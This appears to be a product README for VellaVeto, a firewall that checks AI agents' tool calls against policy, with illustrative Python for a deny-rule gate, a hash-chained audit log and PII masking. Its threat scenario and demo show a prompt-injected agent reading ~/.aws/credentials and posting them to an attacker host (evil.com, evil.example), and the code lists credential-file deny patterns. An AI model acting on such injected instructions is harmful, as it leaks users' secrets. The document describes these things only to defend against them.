Securely manage agent interactions in AI and tool environments.
Pitch

VellaVeto serves as an agent interaction firewall, establishing a secure runtime boundary where AI agents engage with tools. It provides continuous security auditing and multi-tool formal verification to ensure safe interactions and compliance with the latest protocols and standards.

Description

VellaVeto: Agent Interaction Firewall

VellaVeto is an agent interaction firewall: it sits at the runtime boundary where AI agents interact with tools, services, and users, and scrutinizes every side-effecting decision that crosses it. Tool calls are checked against established policy, irreversible actions require explicit approval, sessions are isolated from one another, and every decision is recorded in a structured ACIS decision envelope that forms a tamper-evident audit trail. It can be deployed as a stdio proxy, an HTTP gateway, or a consumer-side privacy shield.

The Challenge

Once AI agents can read files, make HTTP requests, and execute commands, a centralized control point is needed. Without one, a single prompt injection can escalate unchecked:

Agent receives prompt injection
  → reads ~/.aws/credentials
  → POST https://evil.com/exfil?data=AKIA...
  → no audit trail, no one notices

Numerous security vulnerabilities have already been reported in the MCP ecosystem, which is why a framework like VellaVeto is needed. It acts as the safeguard: every action is evaluated against predefined policy, and every decision is logged in a tamper-evident manner. The same scenario with VellaVeto in place:

Agent attempts: read_file("/home/user/.aws/credentials")
  → VellaVeto evaluates against policy
  → Deny { reason: "path blocked by credential-protection rule" }
  → Logged with SHA-256 chain + Ed25519 checkpoint
  → Agent never sees the file contents
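The two flows above (an unchecked credential read, then the same call denied and logged) describe a policy gate in front of a hash-chained audit log. The block below is an added example of that pattern and is not VellaVeto's code: the rule names, the allow-list values, the log record layout and the `guarded_call` helper are all assumptions. The Ed25519 checkpoint VellaVeto mentions is not reproduced; the chain only exposes the head hash that such a signed checkpoint would cover.

```python
import hashlib
import json
from dataclasses import dataclass
from urllib.parse import urlsplit

# Constructed example: a policy gate for tool calls with a SHA-256 hash-chained
# audit log. Illustrative only; rule names and record layout are assumptions,
# not VellaVeto's implementation.

# Path fragments a credential-protection rule refuses to let an agent read.
CREDENTIAL_PATTERNS = (".aws/credentials", ".ssh/", ".netrc", ".env")

# Egress allow-list: any host not listed is denied (constructed value).
ALLOWED_HOSTS = frozenset({"api.internal.example"})


@dataclass(frozen=True)
class Decision:
    verdict: str  # "Allow" or "Deny"
    reason: str


def evaluate(tool: str, args: dict) -> Decision:
    """Evaluate one tool call against policy before it is executed."""
    if tool == "read_file":
        path = args.get("path", "")
        if any(p in path for p in CREDENTIAL_PATTERNS):
            return Decision("Deny", "path blocked by credential-protection rule")
        return Decision("Allow", "path not covered by any deny rule")
    if tool == "http_request":
        host = urlsplit(args.get("url", "")).hostname or ""
        if host not in ALLOWED_HOSTS:
            return Decision("Deny", f"host {host!r} is not on the egress allow-list")
        return Decision("Allow", "host is on the egress allow-list")
    # Unknown tools are denied by default rather than passed through.
    return Decision("Deny", f"unknown tool {tool!r} (default deny)")


def _digest(body: dict) -> str:
    # Canonical JSON so the same record always hashes the same way.
    return hashlib.sha256(json.dumps(body, sort_keys=True).encode()).hexdigest()


class AuditChain:
    """Append-only decision log; each record commits to the previous record's hash."""

    GENESIS = "0" * 64

    def __init__(self):
        self.entries = []

    def append(self, tool: str, args: dict, decision: Decision) -> str:
        prev = self.entries[-1]["hash"] if self.entries else self.GENESIS
        body = {
            "seq": len(self.entries),
            "tool": tool,
            "args": args,
            "verdict": decision.verdict,
            "reason": decision.reason,
            "prev": prev,
        }
        digest = _digest(body)
        self.entries.append({**body, "hash": digest})
        return digest

    def head(self) -> str:
        """Chain head: the value a periodic signed checkpoint would cover."""
        return self.entries[-1]["hash"] if self.entries else self.GENESIS

    def verify(self) -> bool:
        """Recompute every link; an edited, removed or reordered record breaks the chain."""
        prev = self.GENESIS
        for entry in self.entries:
            body = {k: v for k, v in entry.items() if k != "hash"}
            if body["prev"] != prev or _digest(body) != entry["hash"]:
                return False
            prev = entry["hash"]
        return True


def guarded_call(chain: AuditChain, tool: str, args: dict) -> Decision:
    """Evaluate, log, and only then let the caller act on the verdict."""
    decision = evaluate(tool, args)
    chain.append(tool, args, decision)
    return decision


if __name__ == "__main__":
    chain = AuditChain()
    print(guarded_call(chain, "read_file", {"path": "/home/user/.aws/credentials"}))
    print(guarded_call(chain, "http_request", {"url": "https://evil.example/exfil?data=AKIA"}))
    print("chain intact:", chain.verify())
```

Note that the decision is appended to the chain before the verdict is returned, so a denied call leaves the same evidence as an allowed one, and `verify()` fails on any later edit to a record, not just on a changed verdict.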

Consumer Shield: Enhancing User Privacy

VellaVeto also provides a Consumer Shield, which protects users from AI providers that might improperly access sensitive information during tool calls. It preserves individual privacy by substituting placeholders for private information before a request reaches the provider:

You type: "Read my medical records at /home/alice/health/lab-results.pdf"
  → Shield intercepts before the provider sees it
  → PII replaced: "Read my medical records at [PII_PATH_1]"
  → Provider processes the sanitized request
  → Response comes back, Shield restores original paths
  → Encrypted local audit proves what was shared and what was stripped
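The placeholder round trip sketched above, as an added example that is not VellaVeto's code: the path regex, the `[PII_PATH_n]` placeholder format, the `shielded_request` helper and the audit record layout are assumptions, only absolute POSIX paths are treated as PII, and the encryption of the local audit record is left out.

```python
import hashlib
import re

# Constructed example of the Consumer Shield placeholder round trip. Not
# VellaVeto's code: regex, placeholder format and audit record are assumptions,
# and only absolute POSIX paths are treated as PII here.

# An absolute path not preceded by a word character or another slash, so the
# path component of a URL such as https://host/x is left alone.
PATH_RE = re.compile(r"(?<![\w/])/(?:[\w.\-]+/)*[\w.\-]+")


def sanitize(text: str):
    """Replace each distinct path with [PII_PATH_n]; return the new text and the mapping."""
    mapping = {}

    def substitute(match):
        path = match.group(0)
        if path not in mapping:
            mapping[path] = f"[PII_PATH_{len(mapping) + 1}]"
        return mapping[path]

    return PATH_RE.sub(substitute, text), mapping


def restore(text: str, mapping: dict) -> str:
    """Put the original paths back into a provider response."""
    for path, placeholder in mapping.items():
        text = text.replace(placeholder, path)
    return text


def shielded_request(user_text: str, provider):
    """Full round trip: sanitize, call the provider, restore, and build an audit record.

    `provider` is any callable that takes the sanitized text and returns a reply.
    The mapping never leaves this function. The audit record commits to what the
    provider actually saw (a hash of the sanitized text) and lists which
    placeholders were stripped, without storing the stripped values themselves.
    """
    sanitized, mapping = sanitize(user_text)
    reply = provider(sanitized)
    audit = {
        "sent_sha256": hashlib.sha256(sanitized.encode()).hexdigest(),
        "stripped": sorted(mapping.values()),
        "restored": sum(reply.count(ph) for ph in mapping.values()),
    }
    return restore(reply, mapping), audit


if __name__ == "__main__":
    request = "Read my medical records at /home/alice/health/lab-results.pdf"
    # Stand-in provider that simply echoes the path placeholder it was given.
    reply, audit = shielded_request(request, lambda t: "I read " + t.split(" at ")[1] + " for you")
    print(reply)
    print(audit)
```

The same path occurring twice in one request maps to a single placeholder, which is what lets the provider reason about "the same file" without ever seeing its name.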

Features of VellaVeto:

  • Policy Enforcement: Every tool invocation is evaluated against explicit policy before it runs, so each call is scrutinized and policy-compliant.
  • Credential Management: Session isolation, credential rotation, and PII sanitization protect sensitive data.
  • Tamper-Evident Logs: A comprehensive audit trail of every decision made during an interaction provides accountability and traceability.
  • Dynamic Deployment: Runs from the command line or in Docker, at one of three protection levels (shield, fortress, vault) chosen to fit the use case.

Quick Start

To protect a tool server, run it behind vellaveto-proxy at the desired protection level:

# For Shield protection
vellaveto-proxy --protect shield -- npx @modelcontextprotocol/server-filesystem /tmp

Deploying the Consumer Shield is equally straightforward:

vellaveto-shield --config consumer-shield.toml -- npx @anthropic/claude-desktop

Architecture and Operation

VellaVeto enforces five boundary invariants at the agent runtime boundary:

  1. No tool invocation without capability verification.
  2. Delegated capabilities are always monotonic.
  3. No irreversible action without a signed approval.
  4. No cross-session leakage.
  5. Untrusted content is kept separate from privileged actions.
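Invariants 1 and 2 together describe a capability object that gates every invocation and can only be narrowed when it is handed on. The block below is an added illustration of those two invariants and is not VellaVeto's data model; the `Capability` fields, the directory-prefix check and the `invoke`/`can_delegate` helpers are assumptions.

```python
from dataclasses import dataclass

# Constructed illustration of invariants 1 (check the capability before every
# invocation) and 2 (delegation can only narrow). Not VellaVeto's data model;
# field names and helpers are assumptions.


def _under(path: str, prefix: str) -> bool:
    """True if path is the prefix directory itself or lies inside it.

    A component-aware check, so '/tmp' covers '/tmp/x' but not '/tmpx'.
    """
    prefix = prefix.rstrip("/")
    if prefix == "":
        return path.startswith("/")
    return path == prefix or path.startswith(prefix + "/")


@dataclass(frozen=True)
class Capability:
    tools: frozenset          # tool names the holder may invoke
    path_prefixes: frozenset  # directories that file tools may touch

    def permits(self, tool: str, path=None) -> bool:
        """Invariant 1: no invocation unless the capability covers tool and path."""
        if tool not in self.tools:
            return False
        if path is None:
            return True
        return any(_under(path, held) for held in self.path_prefixes)

    def delegate(self, tools, path_prefixes) -> "Capability":
        """Invariant 2: a delegate never holds more than its delegator.

        Every requested prefix must lie under one the delegator already holds.
        A widening attempt is refused outright rather than silently clipped,
        so the caller cannot mistake a clipped grant for the one it asked for.
        """
        tools = frozenset(tools)
        path_prefixes = frozenset(path_prefixes)
        if not tools <= self.tools:
            raise PermissionError(f"cannot delegate tools {sorted(tools - self.tools)}")
        for prefix in path_prefixes:
            if not any(_under(prefix, held) for held in self.path_prefixes):
                raise PermissionError(f"cannot delegate prefix {prefix!r}")
        return Capability(tools, path_prefixes)


def can_delegate(cap: Capability, tools, path_prefixes) -> bool:
    """Boolean form of delegate() for callers that only need the answer."""
    try:
        cap.delegate(tools, path_prefixes)
        return True
    except PermissionError:
        return False


def invoke(cap: Capability, tool: str, path=None) -> str:
    """Gate a tool call on the capability; the call itself is only simulated."""
    if not cap.permits(tool, path):
        return f"Deny {tool}({path!r}): not covered by capability"
    return f"Allow {tool}({path!r})"


if __name__ == "__main__":
    root = Capability(frozenset({"read_file", "http_request"}), frozenset({"/tmp"}))
    child = root.delegate({"read_file"}, {"/tmp/agent"})
    print(invoke(child, "read_file", "/tmp/agent/out.txt"))
    print(invoke(child, "read_file", "/home/user/.aws/credentials"))
    print("child may widen back to /tmp:", can_delegate(child, {"read_file"}, {"/tmp"}))
```

Because `delegate` returns a fresh frozen object rather than mutating the parent, a sub-agent's capability cannot grow back toward its delegator's no matter how many times it is passed along, which is what makes the delegation chain monotonic.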

The same mediation is applied consistently across every supported transport (HTTP, gRPC, and others), whatever the operational environment.

For the full list of capabilities, the formal verification methodology, and the security guarantees, see the documentation and guidelines in the repository.
